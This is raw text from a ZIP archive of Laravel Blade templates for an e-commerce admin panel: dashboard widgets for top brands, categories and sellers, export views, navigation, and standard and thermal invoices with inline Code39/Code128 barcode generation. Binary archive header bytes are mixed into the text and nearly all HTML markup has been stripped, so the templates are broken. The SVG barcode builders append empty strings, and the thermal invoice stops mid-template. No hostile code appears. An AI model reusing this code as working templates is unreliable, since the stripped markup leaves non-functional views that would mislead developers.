@php $lang = App::getLocale(); $category = App\Models\CategoryTranslation::where('category_id', $inhouse_top_category->id) ->where('lang', $lang) ->first(); @endphp {{ $category ? $category->name : translate('Not Found') }}

{{ single_price($inhouse_top_category->total) }}

@endforeachPK�N]��KDtt=views/backend/dashboard/top_brands_products_section.blade.phpnu�[���@php $data_items = '14'; $data_xl_items = '10'; $data_lg_items = '9'; $data_md_items = '7'; $data_md_items = '5'; $data_xs_items = '3'; if (get_setting('vendor_system_activation') == 1){ $data_items = '6.5'; $data_xl_items = '5'; $data_lg_items = '4.5'; } @endphp
@php $top_brands_product_limit = 1; @endphp @foreach($top_brands_products as $key => $top_brands_product)
@foreach($top_brands_product as $row) @php $product_img = null; if($row->product_thumbnail_img){ $product_img = ($row->product_thumbnail_img->external_link == null) ? my_asset($row->product_thumbnail_img->file_name) : $row->product_thumbnail_img->external_link; } $product_url = route('product', $row->product_slug); if ($row->auction_product == 1) { $product_url = route('auction-product', $row->product_slug); } @endphp @endforeach
{{ translate('Item') }} {{ translate('Quantity') }} {{ translate('Total Price') }}
X {{ $row->sales }} {{ single_price($row->total) }}
@php $top_brands_product_limit++; if($top_brands_product_limit > 15) break; @endphp @endforeach
PK�N]\R3(��?views/backend/dashboard/top_category_products_section.blade.phpnu�[���
@php $top_categories_product_limit = 1; @endphp @foreach($top_categories_products as $key => $top_categories_product)
@foreach($top_categories_product as $row) @php $product_img = null; if($row->product_thumbnail_img){ $product_img = ($row->product_thumbnail_img->external_link == null) ? my_asset($row->product_thumbnail_img->file_name) : $row->product_thumbnail_img->external_link; } $product_url = route('product', $row->product_slug); if ($row->auction_product == 1) { $product_url = route('auction-product', $row->product_slug); } @endphp @endforeach
{{translate('Item')}} {{translate('Quantity')}} {{translate('Total Price')}}
X {{ $row->sales }} {{ single_price($row->total) }}
@php $top_categories_product_limit++; if($top_categories_product_limit > 12) break; @endphp @endforeach
PK�N]&K7���>views/backend/dashboard/top_sellers_products_section.blade.phpnu�[���
@foreach($new_top_sellers as $key => $top_sellers_product)
@foreach($top_sellers_product->products as $row) @php $product_img = null; if($row->thumbnail){ $product_img = ($row->thumbnail->external_link == null) ? my_asset($row->thumbnail->file_name) : $row->thumbnail->external_link; } $product_url = route('product', $row->product_slug); if ($row->auction_product == 1) { $product_url = route('auction-product', $row->product_slug); } @endphp @endforeach
{{ translate('Item') }} {{ translate('Quantity') }} {{ translate('Total Price') }}
X {{ $row->total_quantity }} {{ single_price($row->sale) }}
@endforeach
PK�N]�$0:����!views/backend/dashboard.blade.phpnu�[���@extends('backend.layouts.app') @section('content') @if (auth()->user()->can('smtp_settings') && env('MAIL_USERNAME') == null && env('MAIL_PASSWORD') == null)
{{ translate('Please Configure SMTP Setting to work all email sending functionality') }}, {{ translate('Configure Now') }}
@endif @can('admin_dashboard')

{{ $total_customers }}

{{ translate('Total Customer') }}

{{ translate('Top Customers') }}

@foreach ($top_customers as $top_customer)
{{ translate('customer') }}
@endforeach

{{ $total_products }}

{{ translate('Total Products') }}

{{ translate('In-house Products') }}

{{ $total_inhouse_products }}

{{ translate('Sellers Products') }}

{{ $total_sellers_products }}

{{ $total_categories }}

{{ translate('Total Category') }}

@foreach ($top_categories as $key => $top_category)
@php $badge = 'badge-danger'; if ($key == 1) { $badge = 'badge-warning'; } if ($key == 2) { $badge = 'badge-primary'; } $lang = App::getLocale(); $category = App\Models\CategoryTranslation::where('category_id', $top_category->id) ->where('lang', $lang) ->first(); @endphp

{{ $category ? $category->name : translate('Not Found') }}

{{ single_price($top_category->total) }}

@endforeach

{{ $total_brands }}

{{ translate('Total Brands') }}

{{ translate('Top Brands') }}

@foreach ($top_brands as $key => $top_brand)
@php $badge = 'badge-success'; if ($key == 1) { $badge = 'badge-primary'; } if ($key == 2) { $badge = 'badge-info'; } $lang = App::getLocale(); $brand = App\Models\BrandTranslation::where('brand_id', $top_brand->id) ->where('lang', $lang) ->first(); @endphp

{{ $brand ? $brand->name : translate('Not Found') }}

{{ single_price($top_brand->total) }}

@endforeach

{{ number_format_short($total_sale) }}

{{ translate('Total Sales') }}

{{ translate('Sales this month') }}

{{ single_price($sale_this_month) }}

{{ translate('Sales Stat') }}

{{ translate('In-house Sales') }}

{{ single_price($admin_sale_this_month->total_sale) }}

{{ translate('Sellers Sales') }}

{{ single_price($seller_sale_this_month->total_sale) }}

@if (get_setting('vendor_system_activation') == 1)

{{ $total_sellers }}

{{ translate('Total Sellers') }}

@foreach ($status_wise_sellers as $key => $status_wise_seller)

@if ($status_wise_seller->verification_status == 1) {{ translate('Approved Sellers') }} @else {{ translate('Pending Seller') }} @endif

{{ $status_wise_seller->total }}

@endforeach

{{ translate('Top Sellers') }}

@foreach ($top_sellers as $top_seller)
{{ translate('seller') }}
@endforeach

@else @endif

{{ $total_order }}

{{ translate('Total Order') }}

{{ translate('All Orders') }}

{{ translate('Pending order') }}

{{ $total_pending_order }}

{{ translate('Order Placed') }}

{{ $total_placed_order }}

{{ translate('Confirmed Order') }}

{{ $total_confirmed_order }}

{{ translate('Processed Order') }}

{{ $total_picked_up_order }}

{{ translate('Order Shipped') }}

{{ $total_shipped_order }}

{{ translate('In-house Store') }}

{{ single_price($total_inhouse_sale) }}

{{ translate('Total Sales') }}

{{ translate('All In-house Orders') }}

{{ $total_inhouse_products }}

{{ translate('In-house product') }}

{{ number_format($inhouse_product_rating, 2) }}

{{ translate('Ratings') }}

{{ $total_inhouse_order }}

{{ translate('Total Orders') }}

@if (get_setting('vendor_system_activation') == 1)
@endif
@endcan @endsection @section('script') @include('backend.dashboard.dashboard_js') @endsection PK�N]��'views/backend/downloads/brand.blade.phpnu�[���
@php $logo = get_setting('header_logo'); @endphp
@if($logo != null) @else @endif
@foreach ($brands as $key => $brand) @endforeach
{{translate('Brand Name') }} {{translate('ID') }}
{{ $brand->getTranslation('name') }} {{ $brand->id }}
PK�N]Icz��*views/backend/downloads/category.blade.phpnu�[���
@php $logo = get_setting('header_logo'); @endphp
@if($logo != null) @else @endif
@foreach ($categories as $key => $category) @endforeach
{{translate('Category Name') }} {{translate('ID') }}
{{ $category->getTranslation('name') }} {{ $category->id }}
PK�N]������&views/backend/downloads/user.blade.phpnu�[���
@php $logo = get_setting('header_logo'); @endphp
@if($logo != null) @else @endif
@foreach ($users as $key => $user) @endforeach
{{translate('Type') }} {{translate('Name') }} {{translate('ID') }} {{translate('Email') }}
{{ $user->user_type }} {{ $user->name }} {{ $user->id }} {{ $user->email }}
PK�N]S�rr#views/backend/font_family.blade.phpnu�[���@extends('backend.layouts.app') @section('content')
{{ translate('Select Font Family') }}
@csrf
@if(count($fonts) > 20) @endif
@endsection @section('script') @endsection PK�N]@��GRGR%views/backend/inc/admin_nav.blade.phpnu�[���
@if (addon_is_activated('pos_system') && auth()->user()->can('pos_manager')) @endif
{{ translate('Dashboard') }} @can('view_all_orders') {{ translate('Orders') }} @endcan @if (addon_is_activated('preorder')) {{ translate('Preorders') }} @endif @can('earning_report') {{ translate('Earnings') }} @endcan @can('edit_website_page') {{ translate('Homepage Settings') }} @endcan
@can('view_notifications') @endcan @php if (Session::has('locale')) { $locale = Session::get('locale', Config::get('app.locale')); } else { $locale = env('DEFAULT_LANGUAGE'); } @endphp
PK�N]6�@���)views/backend/inc/admin_sidenav.blade.phpnu�[���
    PK�N]��2�#n#n(views/backend/invoices/invoice.blade.phpnu�[���@php $logo = (json_decode(get_setting('invoice_config'), true) ?? [])['invoice_logo'] ?? null; $invoice_title = (json_decode(get_setting('invoice_config'), true) ?? [])['invoice_title'] ?? null; $custom_invoice_title = (json_decode(get_setting('invoice_config'), true) ?? [])['custom_invoice_title'] ?? null; $company_name_and_address = (json_decode(get_setting('invoice_config'), true) ?? [])['company_name_and_address'] ?? null; $company_name = (json_decode(get_setting('invoice_config'), true) ?? [])['company_name'] ?? null; $custom_company_name = (json_decode(get_setting('invoice_config'), true) ?? [])['custom_company_name'] ?? null; $address = (json_decode(get_setting('invoice_config'), true) ?? [])['address'] ?? null; $custom_address = (json_decode(get_setting('invoice_config'), true) ?? [])['custom_address'] ?? null; $phone_email = (json_decode(get_setting('invoice_config'), true) ?? [])['phone_email'] ?? null; $phone = (json_decode(get_setting('invoice_config'), true) ?? [])['phone'] ?? null; $custom_phone = (json_decode(get_setting('invoice_config'), true) ?? [])['custom_phone'] ?? null; $email = (json_decode(get_setting('invoice_config'), true) ?? [])['email'] ?? null; $custom_email = (json_decode(get_setting('invoice_config'), true) ?? [])['custom_email'] ?? null; $footer_text = (json_decode(get_setting('invoice_config'), true) ?? [])['footer_text'] ?? null; $barcode_type = (json_decode(get_setting('invoice_config'), true) ?? [])['barcode_type'] ?? 'qrcode'; $barcode_encode = (json_decode(get_setting('invoice_config'), true) ?? [])['barcode_encode'] ?? null; $custom_barcode_value = (json_decode(get_setting('invoice_config'), true) ?? [])['custom_barcode_value'] ?? null; $business_info = json_decode(get_setting('business_info'), true) ?? []; if ($barcode_encode == 'custom_value') $bval = $custom_barcode_value ?? $order->code ?? ''; elseif ($barcode_encode == 'tracking_code') $bval = $order->tracking_code ?? ''; else $bval = $order->code ?? ''; $show_human_readable_text_below_barcode = (json_decode(get_setting('invoice_config'), true) ?? [])['show_human_readable_text_below_barcode'] ?? null; $show_qr_code_alongside_barcode = (json_decode(get_setting('invoice_config'), true) ?? [])['show_qr_code_alongside_barcode'] ?? null; $show_platform_contact = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_platform_contact'] ?? null; $show_seller_contact = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_seller_contact'] ?? null; $show_tracking_code = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_tracking_code'] ?? null; $show_customer_name = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_customer_name'] ?? null; $show_billing_address = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_billing_address'] ?? null; $show_order_notes = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_order_notes'] ?? null; $show_product_image = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_product_image'] ?? null; $show_sku = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_sku'] ?? null; $show_product_variation = (json_decode(get_setting('invoice_config'), true) ?? [])['fields']['show_product_variation'] ?? null; $shipping = json_decode($order->shipping_address); $billing = json_decode($order->billing_address) ?? $shipping; $first_order = $order->orderDetails->first(); $removedXML = ''; $code39map = [ '0'=>'101001101101','1'=>'110100101011','2'=>'101100101011', '3'=>'110110010101','4'=>'101001101011','5'=>'110100110101', '6'=>'101100110101','7'=>'101001011011','8'=>'110100101101', '9'=>'101100101101','A'=>'110101001011','B'=>'101101001011', 'C'=>'110110100101','D'=>'101011001011','E'=>'110101100101', 'F'=>'101101100101','G'=>'101010011011','H'=>'110101001101', 'I'=>'101101001101','J'=>'101011001101','K'=>'110101010011', 'L'=>'101101010011','M'=>'110110101001','N'=>'101011010011', 'O'=>'110101101001','P'=>'101101101001','Q'=>'101010110011', 'R'=>'110101011001','S'=>'101101011001','T'=>'101011011001', 'U'=>'110010101011','V'=>'100110101011','W'=>'110011010101', 'X'=>'100101101011','Y'=>'110010110101','Z'=>'100110110101', '-'=>'100101011011','.'=>'110010101101',' '=>'100110101101', '$'=>'100100100101','/'=>'100100101001','+'=>'100101001001', '%'=>'101001001001','*'=>'100101101101', ]; $c128map = [ ' '=>'212222','!'=>'222122','"'=>'222221','#'=>'121223','$'=>'121322', '%'=>'131222','&'=>'122213',"'"=>'122312','('=>'132212',')'=>'221213', '*'=>'221312','+'=>'231212',','=>'112232','-'=>'122132','.'=>'122231', '/'=>'113222','0'=>'123122','1'=>'123221','2'=>'223211','3'=>'221132', '4'=>'221231','5'=>'213212','6'=>'223112','7'=>'312131','8'=>'311222', '9'=>'321122',':'=>'321221',';'=>'312212','<'=>'322112','='=>'322211', '>'=>'212123','?'=>'212321','@'=>'232121','A'=>'111323','B'=>'131123', 'C'=>'131321','D'=>'112313','E'=>'132113','F'=>'132311','G'=>'211313', 'H'=>'231113','I'=>'231311','J'=>'112133','K'=>'112331','L'=>'132131', 'M'=>'113123','N'=>'113321','O'=>'133121','P'=>'313121','Q'=>'211331', 'R'=>'231131','S'=>'213113','T'=>'213311','U'=>'213131','V'=>'311123', 'W'=>'311321','X'=>'331121','Y'=>'312113','Z'=>'312311','['=>'332111', '\\'=>'314111',']'=>'221411','^'=>'431111','_'=>'111224','`'=>'111422', 'a'=>'121124','b'=>'121421','c'=>'141122','d'=>'141221','e'=>'112214', 'f'=>'112412','g'=>'122114','h'=>'122411','i'=>'142112','j'=>'142211', 'k'=>'241211','l'=>'221114','m'=>'413111','n'=>'241112','o'=>'134111', 'p'=>'111242','q'=>'121142','r'=>'121241','s'=>'114212','t'=>'124112', 'u'=>'124211','v'=>'411212','w'=>'421112','x'=>'421211','y'=>'212141', 'z'=>'214121','{'=>'412121','|'=>'111143','}'=>'111341','~'=>'131141', ]; $makeSvg = function(string $value, string $type) use ($code39map, $c128map): string { $h = 52; $quiet = 8; $u = 2; $v = strtoupper($value); if ($type === 'code39') { $encoded = '*' . $v . '*'; $bars = []; $x = $quiet; foreach (str_split($encoded) as $ci => $ch) { if (!isset($code39map[$ch])) continue; if ($ci > 0) $x += $u; foreach (str_split($code39map[$ch]) as $bi => $bit) { $w = ($bit === '1') ? $u * 2 + 1 : $u; if ($bi % 2 === 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; } } $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } if ($type === 'code128') { $bars = []; $x = $quiet; $isBar = true; $dp = function(string $pat) use (&$bars, &$x, &$isBar, $u, $h) { foreach (str_split($pat) as $d) { $w = (int)$d * $u; if ($isBar && $w > 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; $isBar = !$isBar; } }; $dp('2114'); $ck = 104; foreach (str_split($value) as $idx => $ch) { $ck += ($idx + 1) * (ord($ch) - 32); if (isset($c128map[$ch])) $dp($c128map[$ch]); } $ck %= 103; $cc = chr($ck + 32); if (isset($c128map[$cc])) $dp($c128map[$cc]); $dp('2331112'); $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } return "{$value}"; }; @endphp {{ translate('INVOICE') }}
    @if($logo != null) @else @endif @if($order->order_from=='pos') {{ translate('POS INVOICE') }} @elseif($invoice_title == 'custom') {{ $custom_invoice_title }} @elseif($invoice_title == 'invoice') {{ translate('INVOICE') }} @elseif($invoice_title == 'tax_invoice') {{ translate('TAX INVOICE') }} @else {{ translate('INVOICE') }} @endif
    @if($show_platform_contact == 1) @endif
    @if($company_name_and_address == 'get_from_general_settings') {{ $company_name }} @elseif($company_name_and_address == 'custom') {{ $custom_company_name }} @else {{ get_setting('site_name') }} @endif
    @if($company_name_and_address == 'get_from_general_settings') {{ $address }} {{ $business_info['postal_code'] ?? '' }} @elseif($company_name_and_address == 'custom') {{ $custom_address }} @else {{ get_setting('contact_address') }} @endif
    {{ translate('Email') }}: @if($phone_email == 'get_from_general_settings') {{ $email }} @elseif($phone_email == 'custom') {{ $custom_email }} @else {{ get_setting('contact_email') }} @endif
    {{ translate('Phone') }}: @if($phone_email == 'get_from_general_settings') {{ $phone }} @elseif($phone_email == 'custom') {{ $custom_phone }} @else {{ get_setting('contact_phone') }} @endif

    @if($show_seller_contact == 1 && $order->shop?->phone) @endif
    {{ translate('Sold By') }}:
    {{ $order->shop->name ?? get_setting('site_name') }}
    {{ get_seller_address($order) }}
    Phone: {{ $order->shop->phone ?? null}}

    @php $gstin = get_seller_gstin($order); @endphp
    @if($gstin != null && is_numeric($first_order->gst_amount)) {{ translate('GSTIN') }}: {{ $gstin }} @endif

    {{ translate('Payment method') }}: {{ translate(ucfirst(str_replace('_', ' ', $order->payment_type))) }}
    {{ translate('Delivery Type') }}: @if ($order->shipping_type != null && $order->shipping_type == 'home_delivery') {{ translate('Home Delivery') }} @elseif ($order->shipping_type == 'pickup_point') @if ($order->pickup_point != null) {{ $order->pickup_point->getTranslation('name') }} ({{ translate('Pickip Point') }}) @else {{ translate('Pickup Point') }} @endif @elseif ($order->shipping_type == 'carrier') @if ($order->carrier != null) {{ $order->carrier->name }} ({{ translate('Carrier') }})
    {{ translate('Transit Time').' - '.$order->carrier->transit_time }} @else {{ translate('Carrier') }} @endif @else {{ translate('N/A') }} @endif
    @if($order->invoice_number != null) @endif @if($show_tracking_code == 1) @endif
    {{ translate('Invoice No') }}: {{ $order->invoice_number }}
    {{ translate('Order ID') }}: {{ $order->code }}
    {{ translate('Tracking Code') }}: {{ $order->tracking_code }}
    {{ translate('Order Date') }}: {{ date('d-m-Y', $order->date) }}
    @if($show_billing_address == 1) @if($billing->email) @endif @if($billing->phone) @endif
    {{ translate('Bill to') }}:
    {{ $billing->name }}
    {{ $billing->address ? $billing->address.',' : '' }} {{ $billing->city ? $billing->city.',' : '' }} {{ !empty($billing->state) ? $billing->state.' - ' : '' }} {{ $billing->postal_code ? $billing->postal_code.',' : '' }} {{ $billing->country }}
    {{ translate('Email') }}: {{ $billing->email }}
    {{ translate('Phone') }}: {{ $billing->phone }}

    @endif @if($shipping->email) @endif @if($shipping->phone) @endif
    {{ translate('Ship to') }}:
    {{ $shipping->name }}
    {{ $shipping->address ? $shipping->address.',' : '' }} {{ $shipping->city ? $shipping->city.',' : '' }} {{ !empty($shipping->state) ? $shipping->state.' - ' : '' }} {{ $shipping->postal_code ? $shipping->postal_code.',' : '' }} {{ $shipping->country }}
    {{ translate('Email') }}: {{ $shipping->email }}
    {{ translate('Phone') }}: {{ $shipping->phone }}
    @if($show_product_image == 1) @endif @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @else @endif @foreach ($order->orderDetails as $key => $orderDetail) @if ($orderDetail->product != null) @if($show_product_image == 1) @endif @if(is_numeric($first_order->gst_amount)) @php $gst_amount = get_gst_by_price_and_rate($orderDetail->price - $orderDetail->coupon_discount , $orderDetail->gst_rate); $shipping_gst = get_gst_by_price_and_rate($orderDetail->shipping_cost, $orderDetail->gst_rate); @endphp @if(same_state_shipping($order)) @else @endif @else @endif @if(is_numeric($first_order->gst_amount)) @else @endif @if(is_numeric($first_order->gst_amount)) @if(same_state_shipping($order)) @else @endif @endif @endif @endforeach
    {{ translate('Image') }}{{ translate('Product Name') }} {{ translate('Qty') }}{{ translate('Gross Amount')}} {{ translate('Discount/ Coupon')}} {{ translate('Taxable Value')}}{{ translate('CGST') }} {{ translate('SGST') }}{{ translate('IGST') }}{{ translate('Unit Price') }} {{ translate('Tax') }}{{ translate('Total') }}
    @if($orderDetail->product->thumbnail_img != null) @else @endif {{ $orderDetail->product->name }} @if($show_product_variation == 1) @if($orderDetail->variation != null) ({{ $orderDetail->variation }}) @endif @endif @if($show_sku == 1)
    @php $product_stock = json_decode($orderDetail->product->stocks->first(), true); @endphp {{translate('SKU')}}: {{ $product_stock['sku'] ?? 'N/A' }} @endif
    {{ $orderDetail->quantity }} {{ single_price($orderDetail->price) }} {{ single_price($orderDetail->coupon_discount) }} {{ single_price($orderDetail->price - $orderDetail->coupon_discount) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount/2) }} {{ single_price($gst_amount) }} {{ single_price($orderDetail->price/$orderDetail->quantity) }} {{ single_price($orderDetail->tax/$orderDetail->quantity) }}{{ single_price($orderDetail->price - $orderDetail->coupon_discount + $gst_amount) }}{{ single_price($orderDetail->price+$orderDetail->tax) }}
    {{translate('Shipping')}} 1 {{ single_price($orderDetail->shipping_cost) }} {{ single_price(0) }} {{ single_price($orderDetail->shipping_cost) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst/2) }} {{ single_price($shipping_gst) }} {{ single_price($orderDetail->shipping_cost + (($orderDetail->shipping_cost* $orderDetail->gst_rate)/100)) }}
    @if($barcode_type == 'qrcode')
    {!! str_replace($removedXML, "", QrCode::size(100)->generate($bval)) !!} @if($show_human_readable_text_below_barcode == 1)
    {{ $bval }}
    @endif
    @else @if($show_human_readable_text_below_barcode == 1) @endif
    {!! $makeSvg($bval, $barcode_type) !!}
    {{ $bval }}
    @if($show_qr_code_alongside_barcode == 1)
    {!! str_replace($removedXML, "", QrCode::size(80)->generate($bval)) !!} @if($show_human_readable_text_below_barcode == 1)
    {{ $bval }}
    @endif
    @endif @endif
    @if(is_numeric($first_order->gst_amount)) @else @endif
    {{ translate('Sub Total') }} {{ single_price($order->orderDetails->sum('price') + $order->orderDetails->sum('shipping_cost') - $order->orderDetails->sum('coupon_discount')) }}
    {{ translate('Total GST') }} {{ single_price($order->orderDetails->sum('gst_amount')) }}
    {{ translate('Sub Total') }} {{ single_price($order->orderDetails->sum('price')) }}
    {{ translate('Shipping Cost') }} {{ single_price($order->orderDetails->sum('shipping_cost')) }}
    {{ translate('Total Tax') }} {{ single_price($order->orderDetails->sum('tax')) }}
    {{ translate('Coupon Discount') }} {{ single_price($order->coupon_discount) }}
    {{ translate('Grand Total') }} {{ single_price($order->grand_total) }}
    @if($footer_text) @endif PK�N]V�f�x�x0views/backend/invoices/thermal_invoice.blade.phpnu�[���@php $invoice_config = json_decode(get_setting('invoice_config'), true) ?? []; $thermal_printer = json_decode(get_setting('thermal_printer'), true) ?? []; $logo = $invoice_config['invoice_logo'] ?? null; $invoice_title = $invoice_config['invoice_title'] ?? null; $custom_invoice_title= $invoice_config['custom_invoice_title'] ?? null; $company_name_and_address = $invoice_config['company_name_and_address'] ?? null; $company_name = $invoice_config['company_name'] ?? null; $custom_company_name = $invoice_config['custom_company_name'] ?? null; $address = $invoice_config['address'] ?? null; $custom_address = $invoice_config['custom_address'] ?? null; $phone_email = $invoice_config['phone_email'] ?? null; $phone = $invoice_config['phone'] ?? null; $custom_phone = $invoice_config['custom_phone'] ?? null; $email = $invoice_config['email'] ?? null; $custom_email = $invoice_config['custom_email'] ?? null; $footer_text = $invoice_config['footer_text'] ?? null; $barcode_type = $invoice_config['barcode_type'] ?? null; $barcode_encode = $invoice_config['barcode_encode'] ?? null; $custom_barcode_value= $invoice_config['custom_barcode_value'] ?? null; $show_logo = $thermal_printer['fields']['show_logo'] ?? null; $show_platform_contact = $thermal_printer['fields']['show_platform_contact'] ?? null; $show_seller_contact = $thermal_printer['fields']['show_seller_contact'] ?? null; $show_tracking_code = $thermal_printer['fields']['show_tracking_code'] ?? null; $show_customer_name = $thermal_printer['fields']['show_customer_name'] ?? null; $show_billing_address = $thermal_printer['fields']['show_billing_address'] ?? null; $show_order_notes = $thermal_printer['fields']['show_order_notes'] ?? null; $show_sku = $thermal_printer['fields']['show_sku'] ?? null; $show_product_variation = $thermal_printer['fields']['show_product_variation'] ?? null; $show_barcode = $thermal_printer['fields']['show_barcode'] ?? null; $show_qrcode = $thermal_printer['fields']['show_qr_code'] ?? null; $show_human_readable_text_below_barcode = $invoice_config['show_human_readable_text_below_barcode'] ?? null; $show_qr_code_alongside_barcode = $invoice_config['show_qr_code_alongside_barcode'] ?? null; if ($barcode_encode == 'custom_value') $bval = $custom_barcode_value ?? $order->code ?? ''; elseif ($barcode_encode == 'tracking_code') $bval = $order->tracking_code ?? $order->code ?? ''; else $bval = $order->code ?? ''; $shipping = json_decode($order->shipping_address); $billing = json_decode($order->billing_address) ?? $shipping; $first_order = $order->orderDetails->first(); $removedXML = ''; $code39map = [ '0'=>'101001101101','1'=>'110100101011','2'=>'101100101011', '3'=>'110110010101','4'=>'101001101011','5'=>'110100110101', '6'=>'101100110101','7'=>'101001011011','8'=>'110100101101', '9'=>'101100101101','A'=>'110101001011','B'=>'101101001011', 'C'=>'110110100101','D'=>'101011001011','E'=>'110101100101', 'F'=>'101101100101','G'=>'101010011011','H'=>'110101001101', 'I'=>'101101001101','J'=>'101011001101','K'=>'110101010011', 'L'=>'101101010011','M'=>'110110101001','N'=>'101011010011', 'O'=>'110101101001','P'=>'101101101001','Q'=>'101010110011', 'R'=>'110101011001','S'=>'101101011001','T'=>'101011011001', 'U'=>'110010101011','V'=>'100110101011','W'=>'110011010101', 'X'=>'100101101011','Y'=>'110010110101','Z'=>'100110110101', '-'=>'100101011011','.'=>'110010101101',' '=>'100110101101', '$'=>'100100100101','/'=>'100100101001','+'=>'100101001001', '%'=>'101001001001','*'=>'100101101101', ]; $c128map = [ ' '=>'212222','!'=>'222122','"'=>'222221','#'=>'121223','$'=>'121322', '%'=>'131222','&'=>'122213',"'"=>'122312','('=>'132212',')'=>'221213', '*'=>'221312','+'=>'231212',','=>'112232','-'=>'122132','.'=>'122231', '/'=>'113222','0'=>'123122','1'=>'123221','2'=>'223211','3'=>'221132', '4'=>'221231','5'=>'213212','6'=>'223112','7'=>'312131','8'=>'311222', '9'=>'321122',':'=>'321221',';'=>'312212','<'=>'322112','='=>'322211', '>'=>'212123','?'=>'212321','@'=>'232121','A'=>'111323','B'=>'131123', 'C'=>'131321','D'=>'112313','E'=>'132113','F'=>'132311','G'=>'211313', 'H'=>'231113','I'=>'231311','J'=>'112133','K'=>'112331','L'=>'132131', 'M'=>'113123','N'=>'113321','O'=>'133121','P'=>'313121','Q'=>'211331', 'R'=>'231131','S'=>'213113','T'=>'213311','U'=>'213131','V'=>'311123', 'W'=>'311321','X'=>'331121','Y'=>'312113','Z'=>'312311','['=>'332111', '\\'=>'314111',']'=>'221411','^'=>'431111','_'=>'111224','`'=>'111422', 'a'=>'121124','b'=>'121421','c'=>'141122','d'=>'141221','e'=>'112214', 'f'=>'112412','g'=>'122114','h'=>'122411','i'=>'142112','j'=>'142211', 'k'=>'241211','l'=>'221114','m'=>'413111','n'=>'241112','o'=>'134111', 'p'=>'111242','q'=>'121142','r'=>'121241','s'=>'114212','t'=>'124112', 'u'=>'124211','v'=>'411212','w'=>'421112','x'=>'421211','y'=>'212141', 'z'=>'214121','{'=>'412121','|'=>'111143','}'=>'111341','~'=>'131141', ]; $makeSvg = function(string $value, string $type) use ($code39map, $c128map): string { $h = 52; $quiet = 8; $u = 2; $v = strtoupper($value); if ($type === 'code39') { $encoded = '*' . $v . '*'; $bars = []; $x = $quiet; foreach (str_split($encoded) as $ci => $ch) { if (!isset($code39map[$ch])) continue; if ($ci > 0) $x += $u; foreach (str_split($code39map[$ch]) as $bi => $bit) { $w = ($bit === '1') ? $u * 2 + 1 : $u; if ($bi % 2 === 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; } } $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } if ($type === 'code128') { $bars = []; $x = $quiet; $isBar = true; $dp = function(string $pat) use (&$bars, &$x, &$isBar, $u, $h) { foreach (str_split($pat) as $d) { $w = (int)$d * $u; if ($isBar && $w > 0) $bars[] = ['x' => $x, 'w' => $w]; $x += $w; $isBar = !$isBar; } }; $dp('2114'); $ck = 104; foreach (str_split($value) as $idx => $ch) { $ck += ($idx + 1) * (ord($ch) - 32); if (isset($c128map[$ch])) $dp($c128map[$ch]); } $ck %= 103; $cc = chr($ck + 32); if (isset($c128map[$cc])) $dp($c128map[$cc]); $dp('2331112'); $tw = $x + $quiet; $r = ''; foreach ($bars as $b) $r .= ""; return "{$r}"; } return "{$value}"; }; @endphp {{ translate('INVOICE') }}
    @if($logo != null && $show_logo == 1) @endif @if($show_platform_contact == 1) @endif
    @if($company_name_and_address == 'get_from_general_settings') {{ $company_name }} @elseif($company_name_and_address == 'custom') {{ $custom_company_name }} @else {{ get_setting('site_name') }} @endif
    @if($company_name_and_address == 'get_from_general_settings') {{ $address }} @elseif($company_name_and_address == 'custom') {{ $custom_address }} @else {{ get_setting('contact_address') }} @endif
    {{ translate('Ph') }}: @if($phone_email == 'get_from_general_settings') {{ $phone }} @elseif($phone_email == 'custom') {{ $custom_phone }} @else {{ get_setting('contact_phone') }} @endif
    {{ translate('Email') }}: @if($phone_email == 'get_from_general_settings') {{ $email }} @elseif($phone_email == 'custom') {{ $custom_email }} @else {{ get_setting('contact_email') }} @endif
    @if($show_qrcode == 1) @endif @if($show_barcode == 1) @endif
    {!! str_replace($removedXML,"", QrCode::size(100)->generate($bval)) !!}
    @php $resolved_barcode_type = (isset($barcode_type) && !empty($barcode_type) && in_array($barcode_type, ['code39', 'code128'])) ? $barcode_type : 'code128'; @endphp {!! $makeSvg($bval, $resolved_barcode_type) !!}
    {{ translate('RETAIL INVOICE') }}
    @if($order->invoice_number != null) {{ translate('Invoice No') }}:
    {{ $order->invoice_number }}
    @endif {{ translate('Order Id') }}:
    {{ $order->code }}
    @if($show_tracking_code == 1) {{ translate('Tracking Code') }}:
    {{ $order->tracking_code }}
    @endif
    {{ translate('Date') }}:
    {{ date('d/m/Y h:i A', $order->date) }}
    {{ translate('Payment') }}: {{ strtoupper(str_replace('_', ' ', $order->payment_type)) }}
    @if($show_seller_contact == 1 && $order->shop?->phone) @endif @php $gstin = get_seller_gstin($order); @endphp @if($gstin != null && addon_is_activated('gst_system')) @endif
    {{ translate('SOLD BY') }}
    {{ $order->shop->name ?? get_setting('site_name') }}
    {{ get_seller_address($order) }}
    {{ translate('Phone') }}: {{ $order->shop->phone }}
    {{ translate('GSTIN') }}: {{ $gstin }}
    {{ translate('Operator') }}: {{ $order->operatorUser ? $order->operatorUser->name : translate('N/A') }}
    {{ translate('PRODUCTS') }}
    @foreach ($order->orderDetails as $key => $orderDetail) @if ($orderDetail->product != null)
    @php $product_stock = json_decode($orderDetail->product->stocks->first(), true); @endphp @if($show_sku == 1) @endif @php $first_order = $order->orderDetails->first(); @endphp @if(is_numeric($first_order->gst_amount)) @else @endif
    {{ $orderDetail->product->name }} @if($show_product_variation == 1 && $orderDetail->variation != null)
    ({{ $orderDetail->variation }}) @endif
    {{ translate('SKU') }}: {{ $product_stock['sku'] }}
